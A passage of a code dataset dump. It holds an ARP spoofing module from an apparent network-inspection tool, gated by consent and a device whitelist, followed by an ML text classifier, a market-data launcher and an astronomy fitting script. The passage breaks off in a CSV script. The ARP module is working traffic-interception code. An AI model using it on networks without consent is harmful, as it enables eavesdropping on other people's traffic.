Min seconds between successive spoofed packets\nMIN_ARP_SPOOF_INTERVAL = 0.01\n\n\nclass ArpSpoof(object):\n\n def __init__(self, host_state):\n\n assert isinstance(host_state, HostState)\n self._host_state = host_state\n\n self._lock = threading.Lock()\n self._active = True\n self._thread = threading.Thread(target=self._arp_spoof_loop)\n self._thread.daemon = True\n\n def start(self):\n\n with self._lock:\n self._active = True\n\n utils.log('[Arp Spoof] Starting.')\n self._thread.start()\n\n def _arp_spoof_loop(self):\n\n prev_ip_mac_dict = None\n\n while True:\n\n if not self._host_state.is_inspecting():\n time.sleep(2)\n continue\n\n time.sleep(1)\n\n with self._lock:\n if not self._active:\n return\n\n with self._host_state.lock:\n if not self._host_state.has_consent:\n utils.log('[ARP Spoof] No consent; no spoofing.')\n continue\n\n # Get ARP cache\n ip_mac_dict = self._host_state.get_ip_mac_dict_copy()\n gateway_ip = self._host_state.gateway_ip\n\n if str(ip_mac_dict) != str(prev_ip_mac_dict):\n\n prev_ip_mac_dict = ip_mac_dict\n\n utils.log('[ARP Spoof] Cache:', ip_mac_dict)\n utils.log(\n '[ARP Spoof] Whitelist:', self._host_state.device_whitelist\n )\n\n # Get gateway MAC addr\n try:\n gateway_mac = ip_mac_dict[gateway_ip]\n except KeyError:\n continue\n\n # Spoof individual devices on the network.\n for (victim_ip, victim_mac) in ip_mac_dict.items():\n\n if victim_ip == gateway_ip:\n continue\n\n # Check against whitelist.\n victim_device_id = \\\n utils.get_device_id(victim_mac, self._host_state)\n if victim_device_id not in self._host_state.device_whitelist:\n utils.log('[ARP Spoof] Ignore:', victim_ip, victim_mac)\n continue\n\n if utils.TEST_OUI_LIST:\n victim_mac_oui = utils.get_oui(victim_mac)\n if victim_mac_oui not in utils.TEST_OUI_LIST:\n continue\n\n utils.safe_run(\n self._arp_spoof,\n args=(victim_mac, victim_ip, gateway_mac, gateway_ip)\n )\n\n with self._lock:\n if not self._active:\n return\n\n time.sleep(max(MIN_ARP_SPOOF_INTERVAL, 2.0 / len(ip_mac_dict)))\n\n def _arp_spoof(self, victim_mac, victim_ip, gateway_mac, gateway_ip):\n \"\"\"Sends out spoofed packets for a single target.\"\"\"\n\n with self._host_state.lock:\n spoof_arp = self._host_state.spoof_arp\n\n gateway_arp = sc.ARP()\n gateway_arp.op = 2\n gateway_arp.psrc = victim_ip\n gateway_arp.hwdst = gateway_mac\n gateway_arp.pdst = gateway_ip\n if not spoof_arp:\n gateway_arp.hwsrc = victim_mac\n utils.log('[Arp Spoof] Restoring', victim_ip, '->', gateway_ip)\n\n victim_arp = sc.ARP()\n victim_arp.op = 2\n victim_arp.psrc = gateway_ip\n victim_arp.hwdst = victim_mac\n victim_arp.pdst = victim_ip\n if not spoof_arp:\n victim_arp.hwsrc = gateway_mac\n utils.log('[Arp Spoof] Restoring', gateway_ip, '->', victim_ip)\n\n sc.send(victim_arp, verbose=0)\n sc.send(gateway_arp, verbose=0)\n\n def stop(self):\n\n utils.log('[Arp Spoof] Stopping.')\n\n with self._lock:\n self._active = False\n\n self._thread.join()\n\n utils.log('[Arp Spoof] Stopped.')\n","sub_path":"v2-src/arp_spoof.py","file_name":"arp_spoof.py","file_ext":"py","file_size_in_byte":4049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"87290671","text":"import sys\nimport pandas as pd\nfrom sqlalchemy import create_engine\nimport nltk\nfrom nltk.tokenize import word_tokenize\nfrom nltk.stem import WordNetLemmatizer\nfrom sklearn.multioutput import MultiOutputClassifier\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.metrics import classification_report, accuracy_score\nfrom sklearn.ensemble import AdaBoostClassifier\nimport pickle\nnltk.download(['punkt', 'wordnet'])\n\n\ndef load_data(database_filepath):\n \"\"\"\n Function to load the necessary data from the cleaned database created with the process_data.py script.\n The features (x), target variables (y) and category names (category_names) will be returned\n\n Parameters\n ----------\n database_filepath: str\n path of the database file with the cleaned data\n\n Returns\n -------\n x:object\n dataframe with the features\n y:object\n dataframe with the target variables\n category_names:object\n dataframe with the target names\n\n \"\"\"\n\n engine = create_engine('sqlite:///' + database_filepath)\n query = 'SELECT * FROM DisasterResponse;'\n df = pd.read_sql_query(query, engine)\n\n x = df[\"message\"]\n y = df.drop(['id', 'message', 'original', 'genre'], axis=1)\n\n return x, y, y.columns\n\n\ndef tokenize(text):\n \"\"\"\n Function to case normalize, lemmatize, and tokenize text using nltk\n This function is used then in the machine learning pipeline to vectorize and then apply TF-IDF to the text\n\n Parameters\n ----------\n text:object\n text data with the raw messages that will be processed\n\n Returns\n -------\n clean_tokens:object\n text data tokenized, processed and ready to be used for the machine learning pipeline\n \"\"\"\n\n # tokenize text\n tokens = word_tokenize(text)\n\n # initiate lemmatizer\n lemmatizer = WordNetLemmatizer()\n\n clean_tokens = []\n for tok in tokens:\n clean_tok = lemmatizer.lemmatize(tok).lower().strip()\n clean_tokens.append(clean_tok)\n\n return clean_tokens\n\n\ndef build_model():\n \"\"\"\n Function to builds a pipeline that processes text and then performs multi-output classification on the 36\n categories in the dataset. GridSearchCV is used to find the best parameters for the model.\n\n Parameters\n ----------\n\n Returns\n -------\n cv:object\n machine learning model to be trained using GridSearchCV\n \"\"\"\n\n pipeline = Pipeline([\n ('vect', CountVectorizer(tokenizer=tokenize)),\n ('tfidf', TfidfTransformer()),\n ('clf', MultiOutputClassifier(AdaBoostClassifier()))\n ])\n\n parameters = {'tfidf__use_idf': [True, False],\n 'clf__estimator__n_estimators': [100, 200, 300],\n 'clf__estimator__learning_rate': [0.8, 1]}\n\n cv = GridSearchCV(pipeline, param_grid=parameters, return_train_score=True, verbose=2, n_jobs=-1)\n\n return cv\n\n\ndef evaluate_model(model, X_test, Y_test, category_names):\n \"\"\"\n Function to Prints the f1 score, precision and recall for the test set for each category\n\n Parameters\n ----------\n model:object\n machine learning model build with the build_model function\n X_test:object\n dataframe with the features\n Y_test:object\n dataframe with the target variables\n category_names:object\n dataframe with the target names\n\n Returns\n -------\n Prints the f1 score, precision and recall for the test set for each category\n The accuracy for each category is also printed\n \"\"\"\n\n Y_pred = model.predict(X_test)\n\n for i, col in enumerate(Y_test):\n print(col)\n print(classification_report(Y_test[col], Y_pred[:, i]))\n\n print(\"Accuracy scores for each category\\n\")\n for i in range(36):\n print(\"Accuracy score for \" + Y_test.columns[i], accuracy_score(Y_test.values[:, i], Y_pred[:, i]))\n\n\ndef save_model(model, model_filepath):\n \"\"\"\n Function to store the classifier into a pickle file to the specified model file path.\n\n Parameters\n ----------\n model:object\n machine learning model build with the build_model function\n X_test:object\n dataframe with the features\n model_filepath:str\n path of the pickle file where the classifier will be stored\n Returns\n -------\n Pickle file\n \"\"\"\n\n with open('disaster_model.pkl', 'wb') as model_filepath:\n pickle.dump(model, model_filepath)\n\n\ndef main():\n if len(sys.argv) == 3:\n database_filepath, model_filepath = sys.argv[1:]\n print('Loading data...\\n DATABASE: {}'.format(database_filepath))\n X, Y, category_names = load_data(database_filepath)\n X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.2)\n\n print('Building model...')\n model = build_model()\n\n print('Training model...')\n model.fit(X_train, Y_train)\n\n print('Evaluating model...')\n evaluate_model(model, X_test, Y_test, category_names)\n\n print('Saving model...\\n MODEL: {}'.format(model_filepath))\n save_model(model, model_filepath)\n\n print('Trained model saved!')\n\n else:\n print('Please provide the filepath of the disaster messages database '\\\n 'as the first argument and the filepath of the pickle file to '\\\n 'save the model to as the second argument. \\n\\nExample: python '\\\n 'train_classifier.py ../data/DisasterResponse.db classifier.pkl')\n\n\nif __name__ == '__main__':\n main()","sub_path":"models/train_classifier.py","file_name":"train_classifier.py","file_ext":"py","file_size_in_byte":5700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"14939232","text":"#!/usr/bin/env python\n# -*- encoding:utf-8 -*-\nimport sys\nsys.path.append('..')\nimport warnings\nwarnings.filterwarnings('ignore')\n\nimport common as CM\nfrom model import Model\nfrom kline import Kline\n\nconfigPath = sys.argv[1]\niid = sys.argv[2]\nrange = sys.argv[3]\n\nmodelID = iid + '_' + range\nservice = CM.Service(configPath, modelID)\n\nklineJob = Kline(configPath, iid, range)\nklineTask = CM.Task(configPath, modelID, klineJob)\n\nmodelJob = Model(configPath, iid, range)\nmodelTask = CM.Task(configPath, modelID, modelJob)\n\nservice.addTask(klineTask)\nservice.addTask(modelTask)\n\nservice.run()\n\n","sub_path":"src/smooth/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"82231966","text":"###############################################################################\n# fitBroadSubsamples.py: do and report fits for the broad sub-samples\n###############################################################################\nimport sys\nimport os, os.path\nimport pickle\nimport copy\nimport numpy\nimport matplotlib\nmatplotlib.use('Agg')\nfrom galpy.util import bovy_plot, save_pickles\nfrom matplotlib import pyplot\nimport define_rcsample\nimport fitDens\nimport densprofiles\nimport compareDataModel\n_NSAMPLES= 50000\n_LW= 1.5\n# Globals\nlocations= None\ndistmods= None\neffsel= None\neffsel_mar= None\neffsel_drim= None\neffsel_sale= None\neffsel_zero= None\nlcen= None\nbcen= None\nhighbIndx= None\noutDiskIndx= None\nbetwDiskIndx= None \ninDiskIndx= None\nldata= None\ndata_highbIndx= None\ndata_outDiskIndx= None\ndata_betwDiskIndx= None\ndata_inDiskIndx= None\ndata_bulgeIndx= None\ndata_brightIndx= None\ndata_mediumIndx= None\ndata_faintIndx= None\ndef fitBroadSubsamples(sample,savename):\n # Setup the selection function\n setup_selection_function()\n # Load the data\n load_data(sample)\n # Do the fits\n global bf_exp, bf_brexp, bf_twoexp\n global ml_exp, ml_brexp, ml_twoexp\n global samples_exp, samples_brexp, samples_twoexp\n if os.path.exists(savename):\n with open(savename,'rb') as savefile:\n bf_exp= pickle.load(savefile)\n bf_brexp= pickle.load(savefile)\n bf_twoexp= pickle.load(savefile)\n ml_exp= pickle.load(savefile)\n ml_brexp= pickle.load(savefile)\n ml_twoexp= pickle.load(savefile)\n samples_exp= pickle.load(savefile)\n samples_brexp= pickle.load(savefile)\n samples_twoexp= pickle.load(savefile)\n else:\n # Perform fits of\n # a) expplusconst\n bf_exp, samples_exp, ml_exp= fit(type='expplusconst')\n # b) brokenexpflare\n bf_brexp, samples_brexp, ml_brexp= fit(type='tribrokenexpflare')\n # c) brokentwoexp\n bf_twoexp, samples_twoexp, ml_twoexp= fit(type='tribrokentwoexp')\n save_pickles(savename,\n bf_exp,bf_brexp,bf_twoexp,\n ml_exp,ml_brexp,ml_twoexp,\n samples_exp,samples_brexp,samples_twoexp)\n # Do the rest of the fits as justfit\n global bf_brexp_g15, ml_brexp_g15, bf_brexp_drim, ml_brexp_drim\n global bf_brexp_sale, ml_brexp_sale, bf_brexp_zero, ml_brexp_zero\n bf_brexp_g15, ml_brexp_g15= fit(type='tribrokenexpflare',dmap='green15',\n justfit=True,init=bf_brexp) \n bf_brexp_drim, ml_brexp_drim= fit(type='tribrokenexpflare',dmap='drimmel03',\n justfit=True,init=bf_brexp)\n bf_brexp_sale, ml_brexp_sale= fit(type='tribrokenexpflare',dmap='sale14',\n justfit=True,init=bf_brexp)\n bf_brexp_zero, ml_brexp_zero= fit(type='tribrokenexpflare',dmap='zero',\n justfit=True,init=bf_brexp)\n return None\n\ndef fit(type='tribrokenexpflare',dmap='marshall06',init=None,justfit=False):\n # Get the correct selection function\n tlocations= copy.deepcopy(locations)\n tdistmods= copy.deepcopy(distmods)\n if dmap == 'green15':\n teffsel= copy.deepcopy(effsel)\n elif dmap.lower() == 'marshall06': \n teffsel= copy.deepcopy(effsel_mar)\n elif dmap.lower() == 'sale14': \n teffsel= copy.deepcopy(effsel_sale)\n elif dmap.lower() == 'drimmel03': \n teffsel= copy.deepcopy(effsel_drim)\n elif dmap.lower() == 'zero': \n teffsel= copy.deepcopy(effsel_zero)\n # Now fit, sample, fit\n fitOut= fitDens.fitDens(ldata,\n numpy.array(tlocations),\n copy.deepcopy(teffsel),\n tdistmods,\n type=type,\n init=init,\n retMaxL=True,\n nsamples=_NSAMPLES,mcmc=not justfit)\n if justfit: return fitOut\n bf, samples, maxl= fitOut\n bf, maxl= fitDens.fitDens(ldata,\n numpy.array(tlocations),\n copy.deepcopy(teffsel),\n tdistmods,\n type=type,\n init=numpy.median(samples,axis=1),\n retMaxL=True)\n return (bf,samples,maxl)\n\ndef setup_selection_function():\n selectFile= '../savs/selfunc-nospdata.sav'\n if os.path.exists(selectFile):\n with open(selectFile,'rb') as savefile:\n apo= pickle.load(savefile)\n # Green et al. \n global locations, distmods, effsel, effsel_mar, effsel_drim, effsel_sale\n global effsel_zero\n with open('../essf/essf_green15.sav','rb') as savefile:\n locations= pickle.load(savefile)\n effsel= pickle.load(savefile)\n distmods= pickle.load(savefile)\n # Marshall et al. (2006)\n with open('../essf/essf_marshall06.sav','rb') as savefile:\n locations= pickle.load(savefile)\n effsel_mar= pickle.load(savefile)\n # Fill in regions not covered by Sale map\n effsel_mar[effsel_mar < -0.5]= effsel[effsel_mar < -0.5]\n # Sale et al. (2014)\n with open('../essf/essf_sale14.sav','rb') as savefile:\n locations= pickle.load(savefile)\n effsel_sale= pickle.load(savefile)\n # Fill in regions not covered by Marshall map\n effsel_sale[effsel_sale < -0.5]= effsel[effsel_sale < -0.5]\n # Drimmel et al (2003)\n with open('../essf/essf_drimmel03.sav','rb') as savefile:\n locations= pickle.load(savefile)\n effsel_drim= pickle.load(savefile)\n # Zero\n with open('../essf/essf_zero.sav','rb') as savefile:\n locations= pickle.load(savefile)\n effsel_zero= pickle.load(savefile)\n # Get (lcen,bcen) for each location\n global lcen, bcen\n lcen= numpy.zeros(len(locations))\n bcen= numpy.zeros(len(locations))\n for ii,loc in enumerate(locations):\n tlcen, tbcen= apo.glonGlat(loc)\n lcen[ii]= tlcen\n bcen[ii]= tbcen\n # Get the locations of various subsamples\n global highbIndx, outDiskIndx, betwDiskIndx, inDiskIndx\n highbIndx= numpy.fabs(bcen) > 10.\n outDiskIndx= (lcen > 140.)*(lcen < 250.)*(True-highbIndx)\n betwDiskIndx= (lcen <= 140.)*(lcen >= 70.)*(True-highbIndx)\n inDiskIndx= (lcen < 70.)*(True-highbIndx)\n return None\n\ndef load_data(sample):\n global ldata\n global data_highbIndx\n global data_outDiskIndx\n global data_betwDiskIndx\n global data_inDiskIndx \n global data_bulgeIndx \n global data_brightIndx\n global data_mediumIndx\n global data_faintIndx\n if sample.lower() == 'all':\n ldata= define_rcsample.get_rcsample()\n elif sample.lower() == 'alllowalpha':\n ldata= define_rcsample.get_rcsample()\n ldata= ldata[ldata[define_rcsample._AFETAG] < 0.1]\n elif sample.lower() == 'lowlow':\n ldata= define_rcsample.get_lowlowsample()\n elif sample.lower() == 'highfeh':\n ldata= define_rcsample.get_highfehsample()\n elif sample.lower() == 'highalpha':\n ldata= define_rcsample.get_highalphasample()\n elif sample.lower() == 'solar':\n ldata= define_rcsample.get_solarsample()\n # Get the indices of the various subsamples defined above\n data_highbIndx= numpy.zeros(len(ldata),dtype='bool')\n for ii in range(len(ldata)):\n if ldata[ii]['LOCATION_ID'] in numpy.array(locations)[highbIndx]:\n data_highbIndx[ii]= True\n data_outDiskIndx= numpy.zeros(len(ldata),dtype='bool')\n for ii in range(len(ldata)):\n if ldata[ii]['LOCATION_ID'] in numpy.array(locations)[outDiskIndx]:\n data_outDiskIndx[ii]= True\n data_betwDiskIndx= numpy.zeros(len(ldata),dtype='bool')\n for ii in range(len(ldata)):\n if ldata[ii]['LOCATION_ID'] in numpy.array(locations)[betwDiskIndx]:\n data_betwDiskIndx[ii]= True\n data_inDiskIndx= numpy.zeros(len(ldata),dtype='bool')\n for ii in range(len(ldata)):\n if ldata[ii]['LOCATION_ID'] in numpy.array(locations)[inDiskIndx]:\n data_inDiskIndx[ii]= True\n return None\n\ndef writeTable(sample,savename,tablename):\n delimiter= ' & '\n types= ['tribrokenexpflare','expplusconst','tribrokentwoexp']\n densmodels= ['broken exp. w/ flare','single exp.',\n 'broken exp. w/ 2 $h_Z$']\n extmaps= ['\\citet{Marshall06a}',\n '\\citet{Green15a}',\n '\\citet{Sale14a}',\n '\\citet{Drimmel03a}',\n 'zero']\n with open(tablename,'w') as tablefile:\n # Start w/ fiducial fit\n if sample.lower() == 'lowlow':\n printline= 'low [Fe/H]'\n elif sample.lower() == 'solar':\n printline= 'solar'\n elif sample.lower() == 'highfeh':\n printline= 'high [Fe/H]'\n elif sample.lower() == 'highalpha':\n printline= 'high [$\\\\alpha$/Fe]'\n printline+= delimiter\n # Fiducial\n printline+= densmodels[0]+delimiter\n printline+= extmaps[0]+delimiter\n printline+= _format_results(types[0],extmaps[0])\n tablefile.write(printline+'\\\\\\\\\\n')\n # Green\n printline= delimiter+delimiter+extmaps[1]+delimiter\n printline+= _format_results_noerr(types[0],extmaps[1]) \n tablefile.write(printline+'\\\\\\\\\\n')\n # Sale\n printline= delimiter+delimiter+extmaps[2]+delimiter\n printline+= _format_results_noerr(types[0],extmaps[2]) \n tablefile.write(printline+'\\\\\\\\\\n')\n # Drimmel\n printline= delimiter+delimiter+extmaps[3]+delimiter\n printline+= _format_results_noerr(types[0],extmaps[3]) \n tablefile.write(printline+'\\\\\\\\\\n')\n # Zero\n printline= delimiter+delimiter+extmaps[4]+delimiter\n printline+= _format_results_noerr(types[0],extmaps[4]) \n tablefile.write(printline+'\\\\\\\\\\n')\n # Exp.\n printline= delimiter+densmodels[1]+delimiter+extmaps[0]+delimiter\n printline+= _format_results(types[1],extmaps[0]) \n tablefile.write(printline+'\\\\\\\\\\n')\n # twoexp\n printline= delimiter+densmodels[2]+delimiter+extmaps[0]+delimiter\n printline+= _format_results(types[2],extmaps[0]) \n tablefile.write(printline+'\\\\\\\\\\n')\n return None\n\ndef _format_results(type,extmap):\n if type.lower() == 'tribrokenexpflare':\n tsamples= samples_brexp\n out= {'hr1':numpy.median(tsamples[0]),\n 'hr1err':numpy.std(tsamples[0]),\n 'hr2':numpy.median(tsamples[2]),\n 'hr2err':numpy.std(tsamples[2]),\n 'rmax':numpy.median(numpy.exp(tsamples[3])),\n 'rmaxerr':1.4826*numpy.median(numpy.fabs(numpy.exp(tsamples[3])-numpy.median(numpy.exp(tsamples[3])))),\n 'hz':numpy.median(1./tsamples[1]),\n 'hzerr':numpy.std(1./tsamples[1]),\n 'rf':numpy.median(tsamples[4]),\n 'rferr':numpy.std(tsamples[4]),\n 'ml':0.}\n if out['rmax'] < 4.:\n out['rmax']= sorted(numpy.exp(tsamples[3]))[int(round(0.95*tsamples.shape[1]))]\n return \"${hr1:.2f}\\pm{hr1err:.2f}$&${hr2:.2f}\\pm{hr2err:.2f}$&$<{rmax:.1f}$&${hz:.2f}\\pm{hzerr:.2f}$&${rf:.2f}\\pm{rferr:.2f}$&\\ldots&{ml:.0f}\".format(**out)\n else:\n return \"${hr1:.2f}\\pm{hr1err:.2f}$&${hr2:.2f}\\pm{hr2err:.2f}$&${rmax:.1f}\\pm{rmaxerr:.1f}$&${hz:.2f}\\pm{hzerr:.2f}$&${rf:.2f}\\pm{rferr:.2f}$&\\ldots&{ml:.0f}\".format(**out)\n elif type.lower() == 'expplusconst':\n tsamples= samples_exp\n out= {'hr':numpy.median(tsamples[0]),\n 'hrerr':numpy.std(tsamples[0]),\n 'hz':numpy.median(1./tsamples[1]),\n 'hzerr':numpy.std(1./tsamples[1]),\n 'ml':-2.*(ml_exp-ml_brexp)}\n return \"\\ldots&${hr:.2f}\\pm{hrerr:.2f}$&\\ldots&${hz:.2f}\\pm{hzerr:.2f}$&\\ldots&&{ml:.0f}\".format(**out)\n if type.lower() == 'tribrokentwoexp':\n tsamples= samples_twoexp\n hzindx= numpy.fabs((1./tsamples[1]-1./tsamples[5])*tsamples[1]) > 0.5\n out= {'hr1':numpy.median(tsamples[0]),\n 'hr1err':numpy.std(tsamples[0]),\n 'hr2':numpy.median(tsamples[2]),\n 'hr2err':numpy.std(tsamples[2]),\n 'rmax':numpy.median(numpy.exp(tsamples[3])),\n 'rmaxerr':numpy.std(numpy.exp(tsamples[3])),\n 'hz1':numpy.median(1./tsamples[1]),\n 'hz1err':numpy.std(1./tsamples[1]),\n 'amp':sorted(densprofiles.ilogit(tsamples[4,hzindx]))[int(round(0.95*numpy.sum(hzindx)))],\n 'hz2':numpy.median(1./tsamples[5,hzindx]),\n 'hz2err':numpy.std(1./tsamples[5,hzindx]),\n 'ml':-2.*(ml_twoexp-ml_brexp)}\n return \"${hr1:.2f}\\pm{hr1err:.2f}$&${hr2:.2f}\\pm{hr2err:.2f}$&${rmax:.1f}\\pm{rmaxerr:.1f}$&${hz1:.2f}\\pm{hz1err:.2f}$&$<{amp:.2f}$&${hz2:.2f}\\pm{hz2err:.2f}$&{ml:.0f}\".format(**out)\n \ndef _format_results_noerr(type,extmap):\n if type.lower() == 'tribrokenexpflare':\n if 'Mar' in extmap:\n tbf= bf_brexp\n tml= ml_brexp\n elif 'Gre' in extmap:\n tbf= bf_brexp_g15\n tml= ml_brexp_g15\n elif 'Dri' in extmap:\n tbf= bf_brexp_drim\n tml= ml_brexp_drim\n elif 'Sal' in extmap:\n tbf= bf_brexp_sale\n tml= ml_brexp_sale\n elif 'zero' in extmap:\n tbf= bf_brexp_zero\n tml= ml_brexp_zero\n out= {'hr1':numpy.median(tbf[0]),\n 'hr2':numpy.median(tbf[2]),\n 'rmax':numpy.median(numpy.exp(tbf[3])),\n 'hz':numpy.median(1./tbf[1]),\n 'rf':numpy.median(tbf[4]),\n 'ml':-2.*(tml-ml_brexp)}\n return \"{hr1:.2f}&{hr2:.2f}&{rmax:.1f}&{hz:.2f}&{rf:.2f}&\\ldots&{ml:.0f}\".format(**out)\n \ndef plotCompareData(sample,savename,plotname):\n locs= ['highb','outdisk','meddisk','indisk']\n indices= [highbIndx,outDiskIndx,betwDiskIndx,inDiskIndx]\n data_indices= [data_highbIndx,data_outDiskIndx,\n data_betwDiskIndx,data_inDiskIndx]\n # Full prediction for numbers\n Xs,pd= compareDataModel.predict_spacedist(bf_brexp,\n numpy.array(locations),\n copy.deepcopy(effsel_mar),\n distmods,\n type='tribrokenexpflare',coord='dm')\n for loc, index, data_index in zip(locs,indices,data_indices):\n bovy_plot.bovy_print(axes_labelsize=20,text_fontsize=20,\n xtick_labelsize=20,ytick_labelsize=20)\n # High |b|\n # Marshall is fiducial\n Xs,pdt= compareDataModel.predict_spacedist(bf_brexp,\n numpy.array(locations)[index],\n copy.deepcopy(effsel_mar)[index],\n distmods,type='tribrokenexpflare',\n coord='dm')\n if (sample.lower() == 'solar' and \\\n (loc.lower() == 'outdisk' or loc.lower() == 'highb')) \\\n or (sample.lower() == 'highfeh' and loc.lower() == 'highb'):\n yrange=[0.,\n 1.6*numpy.amax(pdt/numpy.sum(pdt)/(Xs[1]-Xs[0]))]\n else:\n yrange=[0.,\n 1.4*numpy.amax(pdt/numpy.sum(pdt)/(Xs[1]-Xs[0]))]\n bovy_plot.bovy_hist(ldata['RC_DM_H'][data_index],\n histtype='stepfilled',\n normed=True,\n lw=_LW,\n range=[7.,15.5],\n bins=round(numpy.sqrt(numpy.sum(data_index))*2.),\n yrange=yrange,\n ec='k',fc='0.75',\n xlabel=r'$\\mu$')\n line_mar= bovy_plot.bovy_plot(Xs,pdt/numpy.sum(pdt)/(Xs[1]-Xs[0]),\n color='r',\n lw=2.*_LW,overplot=True,zorder=12)\n bovy_plot.bovy_text(r'$%i\\%% = %i / %i\\ \\mathrm{stars}$' \\\n % (int(round(float(numpy.sum(data_index))/len(ldata)*100.)),\n numpy.sum(data_index),\n len(ldata))\n +'\\n'+r'$%i\\%% = %i / %i\\ \\mathrm{predicted}$' \\\n % (int(round(numpy.sum(pdt)/numpy.sum(pd)*100.)),\n numpy.sum(pdt)/numpy.sum(pd)*len(ldata),len(ldata)),\n top_left=True,size=16.)\n # Green\n Xs,pdt= compareDataModel.predict_spacedist(bf_brexp_g15,\n numpy.array(locations)[index],\n copy.deepcopy(effsel)[index],\n distmods,type='tribrokenexpflare',\n coord='dm')\n line_g15= bovy_plot.bovy_plot(Xs,pdt/numpy.sum(pdt)/(Xs[1]-Xs[0]),\n color='b',\n lw=_LW,overplot=True,zorder=13)\n # Drimmel\n Xs,pdt= compareDataModel.predict_spacedist(bf_brexp_drim,\n numpy.array(locations)[index],\n copy.deepcopy(effsel_drim)[index],\n distmods,type='tribrokenexpflare',\n coord='dm')\n line_drim= bovy_plot.bovy_plot(Xs,pdt/numpy.sum(pdt)/(Xs[1]-Xs[0]),\n color='gold',\n lw=_LW,overplot=True,zorder=12)\n # Sale\n Xs,pdt= compareDataModel.predict_spacedist(bf_brexp_sale,\n numpy.array(locations)[index],\n copy.deepcopy(effsel_sale)[index],\n distmods,type='tribrokenexpflare',\n coord='dm')\n line_sale= bovy_plot.bovy_plot(Xs,pdt/numpy.sum(pdt)/(Xs[1]-Xs[0]),\n color='c',\n lw=_LW,overplot=True,zorder=12)\n # Zero\n Xs,pdt= compareDataModel.predict_spacedist(bf_brexp_zero,\n numpy.array(locations)[index],\n copy.deepcopy(effsel_zero)[index],\n distmods,type='tribrokenexpflare',\n coord='dm')\n line_zero= bovy_plot.bovy_plot(Xs,pdt/numpy.sum(pdt)/(Xs[1]-Xs[0]),\n color='k',\n ls='-',lw=_LW,overplot=True,zorder=10)\n # Marshall + exp\n Xs,pdt= compareDataModel.predict_spacedist(bf_exp,\n numpy.array(locations)[index],\n copy.deepcopy(effsel_mar)[index],\n distmods,type='expplusconst',\n coord='dm')\n line_exp= bovy_plot.bovy_plot(Xs,pdt/numpy.sum(pdt)/(Xs[1]-Xs[0]),\n color='r',\n lw=2*_LW,overplot=True,zorder=10,ls=':')\n # Marshall + twoexp\n Xs,pdt= compareDataModel.predict_spacedist(bf_twoexp,\n numpy.array(locations)[index],\n copy.deepcopy(effsel_mar)[index],\n distmods,type='tribrokentwoexp',\n coord='dm')\n line_twoexp= bovy_plot.bovy_plot(Xs,pdt/numpy.sum(pdt)/(Xs[1]-Xs[0]),\n color='r',\n lw=2*_LW,overplot=True,zorder=11,\n ls='--')\n if sample.lower() == 'lowlow' or sample.lower() == 'highalpha':\n if loc.lower() == 'highb':\n pyplot.annotate(r'$|b| > 10^\\circ$',\n (0.5,1.085),xycoords='axes fraction',\n horizontalalignment='center',\n verticalalignment='top',\n size=20.)\n elif loc.lower() == 'indisk':\n pyplot.annotate(r'$l < 70^\\circ, |b| \\leq 10^\\circ$',\n (0.5,1.085),xycoords='axes fraction',\n horizontalalignment='center',\n verticalalignment='top',\n size=20.)\n elif loc.lower() == 'meddisk':\n pyplot.annotate(r'$70^\\circ \\leq l \\leq 140^\\circ, |b| \\leq 10^\\circ$',\n (0.5,1.085),xycoords='axes fraction',\n horizontalalignment='center',\n verticalalignment='top',\n size=20.)\n elif loc.lower() == 'outdisk':\n pyplot.annotate(r'$140^\\circ < l < 250^\\circ, |b| \\leq 10^\\circ$',\n (0.5,1.085),xycoords='axes fraction',\n horizontalalignment='center',\n verticalalignment='top',\n size=20.)\n # Legend\n if loc.lower() == 'meddisk':\n pyplot.legend((line_mar[0],line_exp[0],line_twoexp[0]),\n (r'$\\mathrm{Marshall\\ et\\ al.\\ (2006)}$'\n +'\\n'+r'$\\mathrm{broken\\ exp.\\ w/\\ flare}$',\n r'$\\mathrm{single\\ exp.}$',\n r'$\\mathrm{broken\\ exp.\\ w/\\ 2}\\ h_Z$'),\n loc='lower right',bbox_to_anchor=(.66,.42),\n numpoints=8,\n prop={'size':14},\n frameon=False)\n elif loc.lower() == 'outdisk':\n pyplot.legend((line_g15[0],line_sale[0],line_drim[0],\n line_zero[0]),\n (r'$\\mathrm{Green\\ et\\ al.\\ (2015)}$',\n r'$\\mathrm{Sale\\ et\\ al.\\ (2014)}$',\n r'$\\mathrm{Drimmel\\ et\\ al.\\ (2003)}$',\n r'$\\mathrm{zero\\ extinction}$'),\n loc='lower right',bbox_to_anchor=(.66,.42),\n numpoints=8,\n prop={'size':14},\n frameon=False)\n if loc.lower() == 'highb':\n if sample.lower() == 'lowlow':\n bovy_plot.bovy_text(r'$\\mathrm{low\\ [Fe/H]}$',\n top_right=True,size=18.)\n elif sample.lower() == 'solar':\n bovy_plot.bovy_text(r'$\\mathrm{solar}$',\n top_right=True,size=18.)\n elif sample.lower() == 'highfeh':\n bovy_plot.bovy_text(r'$\\mathrm{high\\ [Fe/H]}$',\n top_right=True,size=18.)\n elif sample.lower() == 'highalpha':\n bovy_plot.bovy_text(r'$\\mathrm{high}\\ [\\alpha/\\mathrm{Fe]}$',\n top_right=True,size=18.)\n bovy_plot.bovy_end_print(plotname.replace('LOC',loc))\n return None\n\nif __name__ == '__main__':\n # Input:\n # - sample: 'lowlow', 'solar', 'highfeh', 'highalpha'\n # - savename: name of the file for the pickle\n # - tablename: name of the file for the table\n # - plotname: name of the file for the plot\n sample= sys.argv[1]\n savename= sys.argv[2]\n tablename= sys.argv[3]\n plotname= sys.argv[4]\n # First, do the fits\n fitBroadSubsamples(sample,savename)\n # Then write the table\n writeTable(sample,savename,tablename)\n # And make the plot comparing data and model\n plotCompareData(sample,savename,plotname)\n","sub_path":"py/fitBroadSubsamples.py","file_name":"fitBroadSubsamples.py","file_ext":"py","file_size_in_byte":24486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"462846621","text":"import csv\nimport re\nimport os\n\n\nfiles = [f for f in os.listdir('.') if os.path.isfile(f)]\nfor 